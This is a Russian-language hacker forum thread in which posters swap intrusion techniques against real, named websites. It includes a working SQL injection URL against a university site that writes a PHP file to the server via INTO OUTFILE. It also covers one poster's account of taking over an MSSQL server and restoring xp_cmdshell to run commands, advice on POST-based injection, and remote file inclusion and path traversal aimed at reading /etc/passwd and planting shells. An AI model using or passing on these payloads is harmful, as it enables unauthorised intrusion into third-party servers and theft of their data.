Xspider-ом. Он если чо пишет, вряд ли ошибается. Вот по такой ссылке: http://kpi.ua/board/index.php?action=list_messages§ion_id=2&module=1' реальный путь к серверу. А почему подтверждается, что он реальный - написано выше
Прошелся сканером по папкам, в принципе писать можно в http://kpi.ua/files/, но там почему-то пхп файлы не исполняются ( наверное, в хтакцесе что-то нехорошее прописали), но сканер выдал несколько интересных папок. Ближе к делу - Code: http://kpi.ua/board/index.php?action=list_messages§ion_id=-1+union+select+0x3C3F70687020706870696E666F28293B203F3E+from+mysql.user+into+outfile+'/usr/hosting/www.ntu-kpi.kiev.ua/data/2/photo/xekinfo.php'-- http://kpi.ua/2/photo/xekinfo.php Дальше сами...
такая ошибка что-нибудь полезное означает? например: http://www.bar-exclusive.ru/index.php?id=-1 ЗЫ: контрол + а, ибо черное на черном
Назрел у меня вопрос. В общем поимел я один MSSQL сервер. Добавил юзера в бд с правами sysadmin. Через клиента приконектился... При выполнении запроса exec xp_cmdshell .... Вылезает ошибка следущего ввида: ------------------- Сообщение 0, уровень 16, состояние 0, процедура xp_cmdshell, строка 1 Cannot load the DLL 123, or one of the DLLs it references. Reason: 126(error not found). ------------------- Что бы это могло означать? Как мне показалось ищет не ту ДЛЛ'ку и не там где надо. Как это исправить? ------- Ситуация немного прояснилась. Админ прописал несуществующую ДЛЛ "123". Родная библиотека для xp_cmdshell : xplog70.dll Я восстановил все как положено запросами вида: exec sp_dropextendedproc 'xp_cmdshell'; exec sp_addextendedproc 'xp_cmdshell', 'xplog70.dll'; Но к сожалению не только было указанно неправильное название либы, но и нет её. По крайней мере там, где ищет SQL сервак. Есть какие-либо варианты в данном случае? Или сушить вёсла? З. Ы. Моя цель - выполнение команд.
Подскажите метод проведения SQL-инъекций через POST. К примеру, нашел я файл index.php с уязвимым параметром get. Как осуществить инъекцию?
Ну это ясно... я где то читал что HTTP заголовок нужно переделывать.. что то в этом роде. А можно пример какой-нибудь.. гугл что то не хочет искать подобное
Качаешь две проги 1) Naviscope 2) InetCrack Врубаешь 1ую прогу и заходишь на сайт и вбиваешь что либо в уязвимом get. Naviscope перехватывает пакет Потом врубаешь InetCrack и перехваченный пакет вставляешь туда. И там уже развиваешь скуль)) Удачи!!!
помоему проще юзать скрипт мэднета, поищи на madnet.name да и не факт что будет работать через пост если в скрипте определено что переменная получает значение через гет $var = $_GET['var']
Народ, какой аналог команды id (unix) в винде есть? Если таковой есть вообще. Чтобы узнать текущего пользователя / права.
в linux совсем другая система распределения прав.. в винде когда cmd запускаешь, всегда оказываешся в папке с именем юзера, т.е имя можно еще так узнать: Code: D:\Documents and Settings\Admin>[B]%username%[/B] "[B]Admin[/B]" не является внутренней или внешней командой, исполняемой программой или пакетным файлом. Права на файлы можно командой ATTRIB посмотреть...
Поповоду D:\Documents and Settings\Admin> У меня не тот случай, я через скуль. А в остальном спасиб, помогло.
сорри совсем за нубовские вопросы, но все же ... читаю-читаю, но пока многого не догоняю вот допустим нашел я пхп инъекцию ( http://сайт/index.php?p=http://google.com ) ага, гугля отображается ... что дальше? вгружаем шелл. на сервак залил файл шелла и пытаюсь инклудить 1) http://сайт/index.php?p=http://шелл.php - шел открывается, но показывает мой сервак ... получается скрипт выполняется на моем серваке!? и зачем мне это? 2) пробудем так (где-то читал) http://сайт/index.php?p=http://шелл.txt тупо в окне браузера выдает содержание txt'шного файла ... так как же все-таки заинклудить шелл? И еще вопросец: Почему уязвиость вида http://www.pep.spb.org/index.php?p=../../../../../../../../../../../../../etc/passwd называют PHP - include'ом и вообще какой от нее толк? Пассов же там нет никаких ... А что мы можем, просто узнав, какие файлы на серваке?? Всем заранее спасибо, прошу сильно меня не пинать
rip86 http://сайт/index.php?p=http://шелл.txt - это видимо просто фрейм или чтто типо того .. инклуд шелла, происходит если в скрипте было бы прописано include($_GET['p']); или нечто подобное .. а тут чтото вроде echo '<iframe src="'.$_GET['p'].'"></iframe>'; --------- http://www.pep.spb.org/index.php?p=../../../../../../../../../../../../../etc/passwd ну конечно смотря какие права есть .. но можно найти пути по ошибкам, потом поискать конфы сервера, пассы от мускуля/админок чтоб шелл залить ..